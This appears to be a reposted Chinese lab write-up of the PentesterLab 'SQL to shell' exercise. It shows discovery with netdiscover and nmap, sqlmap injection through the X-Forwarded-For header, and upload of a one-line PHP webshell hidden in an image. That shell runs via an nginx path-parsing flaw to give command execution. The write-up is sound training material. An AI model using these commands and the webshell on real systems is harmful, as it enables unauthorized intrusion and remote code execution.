Pentester Lab SQL to shell

PentesterLab提供了可用于测试和了解漏洞的易受攻击的系统。

官方地址:https://pentesterlab.com/

渗透环境

Kali 192.168.22.128

靶机 我们去发现。(在同一内网)

正文开始

首先先介绍一款工具,个人觉得老牛逼——Netdiscover,之前我询问一哥们arp扫描工具时他推荐的。

工具可以在网络上扫描IP地址,检查在线主机或搜索为它们发送的ARP请求,

root@kali:~# netdiscover //直接回车不带任何

自动快速发现地址,默认以192.168.0.0/16的地址扫下去,速度特别快,基本1秒1个网段。特别适合内网渗透中快速发现。

root@kali:~# netdiscover -r 10.16.0.0/24 // -r 设置一个范围

通过上面,我们发现了22.135是靶机,那就老规矩你妈批一下(nmap)

就开一个web端口,连ssh都没有,看来是专门web的靶机。

既然用到你妈批那就顺便介绍下,nmap是端口扫描工具大家都知道,但其实它也具备了例如web漏洞、系统漏洞的扫描能力。

这些扫描已脚本的形式存在。

路径:nmap/scripts/ 大家可以根据情况灵活调用。

nmap --script=default //调用默认脚本

下面这些是常用的脚本,具体可自行尝试

auth: 负责处理鉴权证书(绕开鉴权)的脚本  
broadcast: 在局域网内探查更多服务开启状况,如dhcp/dns/sqlserver等服务  
brute: 提供暴力破解方式,针对常见的应用如http/snmp等  
default: 使用-sC或-A选项扫描时候默认的脚本,提供基本脚本扫描能力  
discovery: 对网络进行更多的信息,如SMB枚举、SNMP查询等  
dos: 用于进行拒绝服务攻击  
exploit: 利用已知的漏洞入侵系统  
external: 利用第三方的数据库或资源,例如进行whois解析  
fuzzer: 模糊测试的脚本,发送异常的包到目标机,探测出潜在漏洞 
intrusive: 入侵性的脚本,此类脚本可能引发对方的IDS/IPS的记录或屏蔽  
malware: 探测目标机是否感染了病毒、开启了后门等信息  
safe: 此类与intrusive相反,属于安全性脚本  
version: 负责增强服务与版本扫描(Version Detection)功能的脚本  
vuln: 负责检查目标机是否有常见的漏洞(Vulnerability),如是否有MS08_067

当然还有其他更多的脚本,如果说nmap脚本使用得溜的话,基本上可以告别metasploit的auxiliary模块,注意我说的是auxiliary(辅助)模块,利用模块还是得要的。

root@kali:~# nmap --script=vuln 192.168.22.135

看,我利用了个vuln脚本,admin就出来了,虽说,admin目录啥的我手工一下也能知道,但是只要这些脚本灵活的使用,功效就自然很大。

既然是个web网站,自然要寄出我们的web扫描器啦。其实页面比较简单,鼠标点点找依照也是可以的。

咱今天就看下AWVS 11版本的表现

整体界面还是比较简洁明了的。从报告来看网站是相当的简单的,不复杂

从报告来看,存在盲注

http://192.168.22.135/cat.php?id=1 //但是我再1后面字符都没反应……

这时候我注意到报告的里面还有个参数 x-forwarded-for 我们加上看看

经过多次尝试最后试出了正常语句

root@kali:~# sqlmap -u "http://192.168.22.135/cat.php?id=1" --headers="X-Forwarded-For: * " –dbs

接下来就把这个库跑出来……

过程就省略了,重要的是这个。

Sql竟然把md5也算出来了,原本我打算我自己口算来着 ^ - ^

第一次见到这么简单的后台& = =

这里有个上传链接……

经过多番尝试,限制得很死,没法绕过 只能上传jpg.gif等图片

从之前nmap的时候发现使用nginx 那就可能存在解析漏洞,

1.jpg/1.php 1.jpg以 php执行

那么刚好我们只要上传1.jpg就好了。

在上传jpg过程中发现。不是单单的jpg后缀就行……也就是说我们只是得搞个图片马来绕过。

查了下资料图片马可以用exiftool 来做。

我屮艸芔茻 这玩意还没有

apt-get install exiftool 安装下。

生成图片马

上传。

因为我shell.php代码如下

<?php system($_GET['c']); ?>

所以我们构造下url

http://192.168.22.135/admin/uploads/1499849149.jpg/1.php?c=whoami

成功拿到shell

总结

这篇文章使用了几款常用工具以及工具之间的相互配合,

本文作者:Umask

原文发布于微信公众号 - 信安之路(xazlsec)

原文发表时间:2017-07-14

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏walterlv - 吕毅的博客

PasswordVault —— 在 UWP 应用中安全地保存密码

2018-06-15 13:43

11630
来自专栏python学习之旅

Python+Selenium笔记(二):配置谷歌+IE环境

#有的时候可能要访问外国的网站下载资料或工具,这时可能出现各种问题,例如谷歌人机验证显示不了、网站打不开等,建议使用一个FQ软件 下载免费版的就行了,土豪请随...

485110
来自专栏编程

年底总结一下Python WEB最好用的几个框架,让你有一个系统的了解

2017年就要过完了,我们来总结一下2017年最好用的17个Python Web框架 群内不定时分享干货,包括2017最新的python企业案例学习资料和零基础...

96180
来自专栏小白安全

渗透一个网站需要做的事情

一,开始信息收集 1,获取域名的whois信息,获取注册者邮箱姓名电话等。 2,查询服务器旁站,因为主站一般比较难,所以先看看旁站有没有通用性的cm...

42890
来自专栏FreeBuf

聊一聊万恶的锁首

当手持8倍镜的98K都不能在使用程序时干掉万恶的锁首时,内心是十万头羊驼奔跑的场景,那我们就来聊一聊市面上常见的锁首方式。 ① :设置OpenHomePage、...

22970
来自专栏蓝天

autoconf手册(一)

Autoconf   Creating Automatic Configuration Scripts   Edition 2.13, for Autoco...

9910
来自专栏Java帮帮-微信公众号-技术文章全总结

Java(web)项目安全漏洞及解决方式【面试+工作】

86530
来自专栏黑泽君的专栏

day70_淘淘商城项目_03_作业

请求URL: /item/update 参数: 表单数据(TbItem) 返回值:Taotaoresult

14520
来自专栏美丽应用

Volumio升级失败的解决方案

17810
来自专栏沃趣科技

Oracle集群时间同步

在RAC中集群的时间应该是保持同步的,否则可能导致很多问题,比如:依赖于时间的应用会造成数据的错误,各种日志打印的顺序紊乱,这将会影响问题的诊断,严重的可能会导...

17740

扫码关注云+社区

领取腾讯云代金券